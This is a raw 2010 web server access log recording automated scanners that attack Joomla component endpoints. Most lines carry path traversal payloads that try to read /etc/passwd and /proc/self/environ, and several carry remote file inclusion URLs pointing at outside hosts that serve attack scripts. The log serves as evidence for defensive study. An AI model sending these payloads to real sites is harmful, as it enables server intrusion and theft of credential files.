74.53.98.146 - - [30/Jul/2010:09:00:04 -0700] "GET /index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:00:04 -0700] "GET /index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:00:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:09:00:28 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.803" "www.brianwinterman.com"
81.93.3.182 - - [30/Jul/2010:09:00:39 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.808" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:09:01:33 -0700] "GET /logs/access_100705.log/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:09:01:34 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.237.20 - - [30/Jul/2010:09:01:37 -0700] "GET /logs/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.803" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:02:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:03:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:03:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:03:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:03:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:03:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
94.23.46.76 - - [30/Jul/2010:09:03:36 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.803" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:04:48 -0700] "GET /logs/access_100629.log%20//index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:04:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:04:50 -0700] "GET /index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:04:50 -0700] "GET /index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:04:51 -0700] "GET /logs//index.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:05:22 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
94.23.46.76 - - [30/Jul/2010:09:06:49 -0700] "GET /logs/access_100705.log/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.46.76 - - [30/Jul/2010:09:06:49 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.803" "www.brianwinterman.com"
94.23.46.76 - - [30/Jul/2010:09:06:50 -0700] "GET /logs/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.803" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:07:14 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
81.93.3.182 - - [30/Jul/2010:09:08:26 -0700] "GET /logs/access_100705.log/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.brianwinterman.com"
81.93.3.182 - - [30/Jul/2010:09:08:26 -0700] "GET /?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 908 "-" "libwww-perl/5.808" "www.brianwinterman.com"
81.93.3.182 - - [30/Jul/2010:09:08:27 -0700] "GET /logs/?option=com_ckforms&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.808" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:00 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:03 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:05 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:16 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:09:21 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:11:07 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:12:57 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=%20ckforms../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:12:57 -0700] "GET /?option=com_ckforms&controller=%20ckforms../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:12:58 -0700] "GET /logs/?option=com_ckforms&controller=%20ckforms../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:15:59 -0700] "GET /logs/access_100614.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:16:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 924 "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:16:03 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:16:14 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:16:18 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
97.107.129.223 - - [30/Jul/2010:09:18:05 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
97.107.129.223 - - [30/Jul/2010:09:18:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
97.107.129.223 - - [30/Jul/2010:09:18:10 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
97.107.129.223 - - [30/Jul/2010:09:18:11 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
97.107.129.223 - - [30/Jul/2010:09:18:15 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
211.169.249.251 - - [30/Jul/2010:09:18:26 -0700] "GET /logs/access_100625.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
195.42.120.131 - - [30/Jul/2010:09:19:22 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
195.42.120.131 - - [30/Jul/2010:09:19:25 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
195.42.120.131 - - [30/Jul/2010:09:19:26 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:19:44 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:19:46 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
222.236.47.182 - - [30/Jul/2010:09:20:01 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
222.236.47.182 - - [30/Jul/2010:09:20:01 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
222.236.47.182 - - [30/Jul/2010:09:20:04 -0700] "GET /logs/access_100529.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:21:44 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:21:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:21:48 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:22:20 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:22:20 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:22:20 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:22:20 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:22:25 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
173.230.141.8 - - [30/Jul/2010:09:22:26 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
222.236.47.182 - - [30/Jul/2010:09:22:30 -0700] "GET /logs/access_100628.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:22:40 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:22:50 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:22:59 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:22:59 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:23:00 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:23:10 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:23:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:23:11 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:23:39 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:23:39 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:23:58 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:24:41 -0700] "GET /logs/access_100620.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:24:57 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:25:41 -0700] "GET /logs/access_100529.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:25:41 -0700] "GET /logs/access_100620.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:25:42 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:25:42 -0700] "GET /logs////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:26:24 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:26:35 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:26:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:26:38 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:26:40 -0700] "GET /logs/access_100529.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:26:41 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:26:42 -0700] "GET /logs////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:26:53 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:26:54 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:27:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:27:48 -0700] "GET /logs/access_100628.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:27:48 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
200.46.235.146 - - [30/Jul/2010:09:27:52 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.smpn1jatiluhur.sch.id/cmd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:28:33 -0700] "GET /logs/access_100616.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
122.155.9.169 - - [30/Jul/2010:09:28:50 -0700] "GET /logs/access_100615.log/errors.php?error=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
122.155.9.169 - - [30/Jul/2010:09:28:51 -0700] "GET /errors.php?error=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
122.155.9.169 - - [30/Jul/2010:09:28:51 -0700] "GET /logs//errors.php?error=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.117.35.252 - - [30/Jul/2010:09:29:22 -0700] "GET /logs/access_100625.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:29:23 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:29:56 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:30:31 -0700] "GET /logs/access_100625.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:31:12 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:09:31:24 -0700] "GET /logs/access_100625.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:32:02 -0700] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:32:25 -0700] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:32:33 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:33:34 -0700] "GET /logs/access_100705.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:33:34 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:33:35 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:09:34:04 -0700] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:34:24 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:34:33 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:34:33 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:34:34 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:35:12 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:35:14 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:35:18 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:35:19 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:09:35:19 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:09:35:26 -0700] "GET /logs/access_100629.log//index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
